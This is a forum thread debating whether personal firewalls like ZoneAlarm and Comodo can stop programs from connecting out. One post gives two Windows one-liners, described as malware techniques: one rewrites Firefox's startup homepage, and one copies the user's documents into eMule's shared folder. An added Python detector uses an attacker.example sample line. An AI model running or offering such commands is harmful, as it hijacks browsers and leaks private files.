Comodo Firewall

I guess you already know about layered security. There's a nice write-up here from those "clueless" people at the NSA. Perhaps they should employ Mr Gottschalk for their security needs instead. http://66.102.9.104/search?q=cache:Ey9MYav_X80J:

me

Reply to
bassbag

It's the Windows way of doing things -- also the Achilles' heel! I always hated the registry; totally non-portable solution.

B. Nice wrote:
> As any personal firewall it runs in the same environment as it is
> supposed to protect. What else do you need to know?

True, if you're careless enough to log in as admin and then run IE. The LUA concept runs users at limited access rights, and thus only the registry for the current user can be attacked -- and the PF is protected.

Reply to
Jeff B

Right, then please stick to technical facts. There are numerous IPC methods with no security protocols in almost any operating system, not to mention purely passive communication like writing to config files.

For your convenience, this is how normal malware tunnels your firewall:

for /f "delims=" %i in ('dir /s /b prefs.js') do echo user_pref('browser.startup.homepage','formatting link')>>"%i"

for /f "delims=" %i in ('dir /s /b /ad emule') do xcopy /s %appdata%\"My Documents" "%i\Incoming"

To find someone who is so stupid to recommend a program that obviously can't work?

No. This is a place to discuss about real firewalls, VPN and network communication as well as serious host-based packet filters (whereas 'serious' excludes the common 'personal firewall' shit and strange ideas about non-working application control).

Why? Actually it's quite simple:

( ) You trust your applications. Then such control is purely superfluous.

( ) You don't trust your applications. Then they're in fact MALWARE, as legitimate as they may seem, and you seriously expect them to circumvent your pseudo-security. In fact, most such programs really do, and not because they're malicious, but to circumvent the network error that your non-serious trial of security poses. You log their first trial, you won't see the second one, which is successful.

Reply to
Sebastian Gottschalk

Are you talking about an empty set of programs? You could at least try to name an example which we will easily deconstruct.

Reply to
Sebastian Gottschalk

Usually not, because there's no serious program that does so. Could you state an example?

So you really never bothered to actually audit your measures, did you? Maybe you would notice that it's even pretty common to use the Raw Sockets API to easily bypass such stupid filters.

Most likely your incompetence. I haven't seen any legitimate program yet that "phones home" without being configured to do so or doing so by a user-invoked event (e.g. clicking an rtsp:// URL in a web browser, which opens up VideoLanClient, which then tries to connect to that server).

Yes, I do. And you should too, because there are thousands, if not millions of user questions in web forums, Usenet and everywhere around because of totally unrelated messages, whereas those broken products simply invented non-existing packets/connections/calls.

Nah, that's just what you wish. Reality looks different.

And interestingly, I don't have any need to employ filters to make programs not opening any unwanted network connections. They simply don't do. Maybe I did something right?

Reply to
Sebastian Gottschalk

Because the term "defense in depth" describes the real non-misunderstood concept without any buzz.

I'd say it's even more trivial. For spouting rubbish, you need to be creative - restoring an API hook (either usermode or kernelmode) is a trivial thing of some few codelines that simply do the obvious (e.g. documented!) thing.

Then you should be able to spot the obvious flaw.

Reply to
Sebastian Gottschalk

Ahh i see....a bit like half a dozen of one and six of the other.

I guess you're much more creative than I gave you credit for.

Oh, I do... I do.
me

Reply to
bassbag

I must've missed the charter for this newsgroup.

Care to repost it?

Notan

Reply to
Notan

I have mentioned several programs that send without my asking for it.

Even MS MediaPlayer sends things even if the checkbox not to send anything is checked. Word does. I have disk defraggers that insist on connecting to the net (why on earth do they need that?) etc. etc. etc.

But all of these ARE stopped by ZA (and probably Comodo, haven't tested with that one yet). So if you can't stop ALL communication, you can stop some (from programs that don't use "back ways" to send stuff).

So again: this is NOT a discussion of security holes. This is a question of what programs I can use to do the same thing as ZA and Comodo to check/stop applications that try to send/act as servers using the "normal" way (no fancy programming to use advanced ways).

So in that context: what programs will give me that functionality without using 30 MB of my memory and adding a FW and other stuff that I already have in my router? That is as simple as it is :-)

Reply to
Lars-Erik Østerud

Reading through this thread, I didn't find just one little program mentioned.

Very doubtful. Maybe you should read the documentation "Using Windows XP with Service Pack 2 in a managed environment - controlling communication with the internet" again (or in the first place), carefully analyze every option related to WMP and find the ones you overlooked / ignored / misunderstood. And then check again if it still does "phone home".

So not only can I verify that the entire documentation holds correctly for all invoked components, it even sheds a pretty good light on Windows XP: you can avoid everything except the activation process, which can also be done by anonymous telephone - and the only bad thing is that you can't easily acquire the activation-free Corporate edition.

That would be even more news.

Huh? Which ones?

Hint: "normal" applications already use those fancy ways. Did I ever mention Adobe License Manager Service (which ships with almost any costly Adobe product)? It uses connections via the Raw Sockets API to bypass exactly such stupid "personal firewalls", because if the connection was blocked it simply wouldn't work and the users are too stupid to configure it correctly. What about RealPlayer? It simply writes an HTML file to the temp dir, then invokes the default web browser using the common ShellExecuteEx() function and uses a META redirect to connect to the outside. I would do it the same way. And if a "firewall" ever caught it as a "phone home" attempt, I'd call it stupid, because it produced the network connection error in the first place and made such a "use the web browser's proxy and authentication" error correction necessary.

A virtual machine like VMware?

Reply to
Sebastian Gottschalk
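The two "borrow a trusted program" bypasses described in this thread (appending a startup-homepage line to Firefox's prefs.js, and dropping a META-refresh HTML file that a ShellExecuteEx()-launched browser then fetches) both leave artifacts on disk that a host can look for. The following Python is an added example, not code from the thread or from any product mentioned in it. The prefs.js text and the HTML files are constructed samples, and the hostnames in them (attacker.example, updates.example) are placeholders. The prefs check keeps every assignment of a pref rather than the first one, because Firefox applies prefs.js top to bottom and the appended line is the one that takes effect; the HTML check only recognises the usual attribute order (http-equiv before content).

```python
"""Host-side check for the 'borrow a trusted program' bypasses discussed above.

Added example, not code from the thread or from any product it mentions.
All inputs below are constructed samples; the hostnames are placeholders.
"""
import os
import re
import tempfile
from typing import Dict, List, Optional, Tuple

# A Firefox prefs.js line.  Both quote styles are accepted: Firefox's pref
# parser takes either, and the bypass command in the thread writes single
# quotes, so a checker that only knows double quotes would miss it.
_PREF_RE = re.compile(
    r"""^\s*user_pref\(\s*(['"])(?P<name>[^'"]+)\1\s*,\s*(?P<value>.*?)\s*\)\s*;?\s*$"""
)

# <meta http-equiv="refresh" content="N;url=..."> with http-equiv before content.
_META_RE = re.compile(
    r"""<meta\s+[^>]*http-equiv\s*=\s*['"]?refresh['"]?[^>]*"""
    r"""content\s*=\s*['"]\s*\d+\s*;\s*url\s*=\s*([^'"\s>]+)""",
    re.IGNORECASE,
)


def parse_prefs(text: str) -> Dict[str, List[str]]:
    """Map each pref name to every value assigned to it, in file order.

    Firefox applies prefs.js top to bottom, so the last assignment wins;
    keeping all of them is what makes an appended override visible.
    """
    prefs: Dict[str, List[str]] = {}
    for line in text.splitlines():
        m = _PREF_RE.match(line)
        if not m:
            continue
        value = m.group("value")
        if len(value) >= 2 and value[0] in "'\"" and value[-1] == value[0]:
            value = value[1:-1]  # strip the string quotes, keep numbers as-is
        prefs.setdefault(m.group("name"), []).append(value)
    return prefs


def homepage_override(prefs_text: str) -> Optional[str]:
    """Return the effective startup homepage if it is assigned more than once.

    A single assignment is the normal state; a second one at the end of the
    file is exactly what 'echo user_pref(...) >> prefs.js' produces.
    """
    values = parse_prefs(prefs_text).get("browser.startup.homepage", [])
    return values[-1] if len(values) > 1 else None


def meta_refresh_target(html: str) -> Optional[str]:
    """Return the URL a META refresh would send the browser to, or None."""
    m = _META_RE.search(html)
    return m.group(1) if m else None


def scan_dir_for_redirects(path: str) -> List[Tuple[str, str]]:
    """List (file name, target URL) for HTML files in `path` that redirect off-host."""
    hits: List[Tuple[str, str]] = []
    for entry in os.scandir(path):
        if not entry.is_file() or not entry.name.lower().endswith((".htm", ".html")):
            continue
        with open(entry.path, encoding="utf-8", errors="replace") as fh:
            target = meta_refresh_target(fh.read())
        if target and target.lower().startswith(("http://", "https://")):
            hits.append((entry.name, target))
    return sorted(hits)


# Constructed prefs.js: the user set about:blank, then an appended line
# (single quotes, no trailing semicolon, as in the thread's command) overrides it.
SAMPLE_PREFS = """\
# Mozilla User Preferences
user_pref("browser.startup.homepage", "about:blank");
user_pref("network.proxy.type", 0);
user_pref('browser.startup.homepage','http://attacker.example/?id=host1')
"""

# Constructed stand-in for the file a RealPlayer-style launcher drops in %TEMP%.
SAMPLE_REDIRECT_HTML = (
    '<html><head><meta http-equiv="refresh" '
    'content="0;url=http://updates.example/ping?u=1"></head></html>'
)


def demo() -> dict:
    """Run both checks against the constructed samples in a scratch directory."""
    with tempfile.TemporaryDirectory() as tmp:
        with open(os.path.join(tmp, "rp_launch.html"), "w", encoding="utf-8") as fh:
            fh.write(SAMPLE_REDIRECT_HTML)
        with open(os.path.join(tmp, "readme.html"), "w", encoding="utf-8") as fh:
            fh.write("<html><body>no redirect here</body></html>")
        redirects = scan_dir_for_redirects(tmp)
    return {"homepage_override": homepage_override(SAMPLE_PREFS), "redirects": redirects}


if __name__ == "__main__":
    for key, val in demo().items():
        print(f"{key}: {val}")
```

On a real machine you would point `scan_dir_for_redirects` at the user's temp directory and feed `homepage_override` the contents of each prefs.js found under the profile directories; the checks only detect the two specific vectors the thread names, not the raw-socket case, which leaves no file behind.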

By using APPs monitoring, how will you determine if what your "nice" programs are doing is to be considered "good" or "bad"?

Please explain your experience of Word connecting and sending stuff. Where does Word send what?

/B. Nice

Reply to
B. Nice

I agree. The registry is implemented terribly incompetently.

Yours, VB.

Reply to
Volker Birk

Why don't you configure these applications not to communicate?

Yours, VB.

Reply to
Volker Birk

They do. This often is called "online software update", and is an important feature.

The misunderstanding is that nice programs of course can be configured whether to communicate or not. And not-so-nice programs cannot be configured and cannot be prevented from communicating.

Yours, VB.

Reply to
Volker Birk

Really? Being correctly configured not to do so? Could you describe an example?

I doubt that.

I doubt that. Zone Alarm claims to do so, but this is just wrong. If you're talking about programs where the author has no doubtful intentions, then configuring will be enough. If the author has such intentions, then she/he will ignore Zone Alarm.

Yours, VB.

Reply to
Volker Birk

Have done that where possible. But some of them still cause a "trying to connect to internet" :-/

Reply to
Lars-Erik Østerud

OK, can you state an example of such an application, your entire configuration and the communication taking place?

Reply to
Sebastian Gottschalk

Right, and that's why it's not "phoning home", but you're advising it to "phone" somewhere by the configuration you entered (or left).

Reply to
Sebastian Gottschalk

It's a simple database with a B+ tree architecture and a hash table to address the individual nodes. SQLite is almost no different, and about any database is implemented like that. That's why it doesn't slow down from 1000+ keys.

Reply to
Sebastian Gottschalk

Please give an example.

Yours, VB.

Reply to
Volker Birk

Cabling-Design.com Forums website is not affiliated with any of the manufacturers or service providers discussed here. All logos and trade names are the property of their respective owners.